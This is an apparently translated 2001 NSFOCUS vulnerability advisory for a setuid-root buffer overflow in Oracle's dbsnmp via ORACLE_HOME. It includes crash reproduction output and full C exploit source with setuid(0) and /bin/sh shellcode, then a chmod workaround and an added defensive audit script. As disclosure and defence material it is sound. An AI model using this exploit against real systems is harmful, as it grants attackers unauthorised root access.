NSFOCUS Security Monthly -> Issue 24 -> Latest Vulnerabilities

Oracle 'dbsnmp' Buffer Overflow Vulnerability

Date: 2001-08-13

Affected systems:
Oracle 8.1.6
Oracle 8.1.7
Oracle 9i
- Linux
Description:
--------------------------------------------------------------------------------


The 'dbsnmp' program shipped with Oracle 8.1.6/8.1.7 is installed setuid root by default. When the program processes the ORACLE_HOME environment variable it performs no effective bounds check: if the variable is set to a string longer than 749 bytes, an attacker can trigger a buffer overflow. By overwriting sensitive data in memory, the attacker can obtain root privileges.

In the default installation 'dbsnmp' is executable only by members of the 'oinstall' group, so an attacker must first obtain 'oinstall' group privileges before being able to escalate.

<* Source: Juan Manuel Pascual (pask@plazasite.com) *>

Test program:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear all risk!



Juan Manuel Pascual (pask@plazasite.com) provided the following test code:


[oracle@proves1 iAS]$ ls -alc /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
-rwsr-s---    1 root     oinstall   667874 jul 18 15:38 /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 8.1.6]$ /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 8.1.6]$ dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Segmentation fault


This buffer overflow is also present in Oracle 9i:



[oracle@proves1 iAS]$ ls -alc /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
-rwsr-s---    1 root     oinstall   971665 abr 11 17:41 /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 iAS]$ /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462

[oracle@proves1 iAS]$ Failed to initialize nl component,error=462
[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 iAS]$ /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
Segmentation fault

/* Exploit code for dbsnmp binary in Oracle 8.1.6.0.0 Linux Platform. I tested
it in RH 6.2.

dbsnmp makes setresuid(,getuid(),) before reading ORACLE_HOME environment
variable. It's necessary to call setuid(0) before normal shellcode.

In my tests Offset may vary from 7846 to 7896. It's possible to obtain a normal
(uid=oracle) shell for low offsets (incomplete setuid(0) jumps).


"Fire falls instead of manna,
the asphalt disguises itself as sea,
the shoe cannot find the pedal,
it seems Satan is on the loose."

            L.E.Aute


This vulnerability was researched by:
    Juan Manuel Pascual <pask@plazasite.com>

Special thanks to:

    Ivan Sanchez <isanchez@plazasite.com>
    Mundo Alonso-Cuevillas <mundo@plazasite.com>
*/





#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memset */

#define BUFFER                                  800
#define OFFSET                                 7896
#define NOP                                    0x90
#define BINARY  "/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp"


char shellcode[] =
"\x90"        /* Additional NOP */
"\x31\xc0"    /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"    /* standard Linux/x86 execve("/bin/sh") shellcode follows */
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


/* Return the current stack pointer (i386/gcc only: the value is left in EAX). */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset=OFFSET;

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(1);
  }

  /* Fill the whole buffer with the guessed return address. */
  addr = get_sp() -offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* Kept as in the original; note that the C library signature is memset(ptr, value, n). */
  memset(buff,bsize/2,NOP);

  /* Place the shellcode in the middle of the buffer. */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  /* Deliver the buffer through ORACLE_HOME and run the setuid binary. */
  setenv("ORACLE_HOME",buff,1);
  system(BINARY);
  return 0;
}


--------------------------------------------------------------------------------
Recommendation:

Temporary workaround:

Remove the setuid bit from 'dbsnmp':
# chmod a-s <Oracle installation directory>/bin/dbsnmp

Vendor patch:

The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://www.oracle.com/
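
The following audit helper is an added example and not part of the advisory: it checks whether a 'dbsnmp' binary still carries the setuid/setgid bits shown in the -rwsr-s--- listing above and applies the chmod a-s workaround. The path is whatever you pass in (defaulting to $ORACLE_HOME/bin/dbsnmp), and the function names are my own.

```shell
#!/bin/sh
# Added audit helper (not from the advisory): detect a setuid/setgid dbsnmp
# and apply the advisory's workaround. Function names are my own choice.

# 0 = setuid or setgid bit present, 1 = clean, 2 = file missing.
dbsnmp_has_sbits() {
    f="$1"
    [ -e "$f" ] || return 2
    # Permission string, e.g. "-rwsr-s---" in the listing above;
    # char 4 is the owner execute slot, char 7 the group execute slot.
    mode=$(ls -ld "$f" | cut -c1-10)
    sbits=$(printf '%s' "$mode" | cut -c4,7)
    case "$sbits" in
        *[sS]*) return 0 ;;
        *)      return 1 ;;
    esac
}

# Workaround from the advisory: chmod a-s. Returns 0 only if the file is
# clean afterwards (a read-only mount could leave it unchanged).
dbsnmp_strip_sbits() {
    chmod a-s "$1" || return 1
    if dbsnmp_has_sbits "$1"; then
        return 1
    fi
    return 0
}

# Print a verdict for one path; exit status mirrors dbsnmp_has_sbits.
dbsnmp_report() {
    f="$1"
    rc=0
    dbsnmp_has_sbits "$f" || rc=$?
    case "$rc" in
        0) echo "VULNERABLE: $(ls -ld "$f" | cut -c1-10) $f -> run: chmod a-s $f" ;;
        1) echo "OK: $f has no setuid/setgid bits" ;;
        *) echo "MISSING: $f" ;;
    esac
    return "$rc"
}

# Usage: sh audit_dbsnmp.sh /path/to/bin/dbsnmp (defaults to $ORACLE_HOME/bin/dbsnmp)
if [ -n "${1:-${ORACLE_HOME:-}}" ]; then
    dbsnmp_report "${1:-$ORACLE_HOME/bin/dbsnmp}" || :
fi
```

Run it once before and once after the chmod to confirm the bits are really gone on the filesystem the binary lives on.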

All rights reserved. Reproduction without permission is prohibited.